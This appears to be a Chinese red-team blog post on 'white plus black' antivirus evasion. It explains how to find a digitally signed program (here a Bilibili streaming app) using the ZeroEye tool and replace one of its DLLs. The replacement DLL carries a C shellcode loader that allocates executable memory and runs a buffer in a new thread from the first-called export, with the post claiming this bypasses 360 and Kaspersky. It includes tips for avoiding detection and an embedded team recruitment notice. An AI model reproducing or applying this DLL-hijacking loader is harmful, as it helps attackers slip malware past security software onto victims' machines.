2025-12-22 04:29:47 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 这篇文章介绍了白加黑免杀技术，通过将恶意DLL替换为带数字签名的白程序所需的DLL，从而绕过360和卡巴斯基等杀毒软件的检测。文章详细说明了如何使用ZeroEye工具寻找合适的白文件，如何创建恶意DLL项目，以及如何将shellcode加载到最先调用的导出函数中。通过实际演示，展示了该技术成功绕过360和卡巴斯基的效果，并建议配合睡眠混淆技术进一步提高免杀效果。 综合评分： 89 文章分类： 免杀,漏洞分析,实战经验,安全工具,红队

cover_image

[免杀]白加黑轻松绕过360/卡巴

sun4et

OnePanda-Sec

2025年12月15日 09:47 湖北

招新

OnePanda-Sec

-招新说明-

**招新要求

· 热爱网络安全，喜欢CTF

· 拥有CTF比赛经验，有较好比赛成绩的

· 乐于奉献、热爱分享，愿意提升自己同时帮助他人

· 时间允许参加各类赛事，服从战队管理与安排

· 各类比赛获奖者、能力出众者视情况考量

· 未参与其他高校联队

· 大一同学视情况放宽资历要求**

联系方式

发送简历于邮箱

· 简历邮箱：[email protected]

聘

一、介绍

1、什么是白加黑

当一个 EXE 启动时，该程序会先把它需要的DLL加载起来。如果把DLL换成带后门的版本，那么执行该程序就会顺带把恶意 DLL 一起加载，后门代码也执行起来了。

这种把正常 DLL 替换掉的做法一般就叫 DLL 劫持。“白+黑”里的“白”指的是带签名的干净 EXE，“黑”说的就是混进去的那份恶意 DLL。

2、白加黑的作用

因为借助的是带有数字签名的白程序，所以杀毒软件对其部分恶意行为不会拦截，比如说常规进程注入360会拦截、卡巴执行shell命令会拦截等，使用白加黑上线后执行这些操作杀软则会放宽不拦截。

二、如何挖掘利用白文件

1、挖掘白文件

这里推荐ZeroEye自动收集DLL的项目

ZeroEye.exe -p D:\ -s&nbsp;#收集 D 盘中存在数字签名的 exe链接: https://github.com/ImCoriander/ZeroEye

这里是搜索出来的程序，选择的DLL最好满足下面两点:

①DLL比较少的并且不要有弹窗。

②不要使用带有微软签名的程序！！！因为微软签名的程序都被标记了，杀软比对一下hash就知道是否为DLL劫持。

找了一会看上了哔哩哔哩直播姬

三、制作免杀项目

创建vs的 dll项目

搜索出来的dll项目中/infos目录中有导出表的代码，直接复制粘贴过来即可:

为了找出程序执行的时候先调用哪个导出函数，执行一下直播坤

之后只需要将加载shellcode的代码放到最先调用执行的导出函数中即可(cef_api_hash)

简单的加载器代码，测试下上线:

extern&nbsp;"C"&nbsp;__declspec(dllexport)&nbsp;int&nbsp;cef_api_hash(){&nbsp; &nbsp; LPVOID exec_mem =&nbsp;VirtualAlloc(NULL,&nbsp;sizeof(buf), MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);&nbsp; &nbsp;&nbsp;memcpy(exec_mem, buf,&nbsp;sizeof(buf));&nbsp; &nbsp; HANDLE handle =&nbsp;CreateThread(&nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp; (LPTHREAD_START_ROUTINE)exec_mem,&nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp;&nbsp;0);&nbsp;&nbsp;WaitForSingleObject(handle,&nbsp;-1);&nbsp;&nbsp;return&nbsp;0;}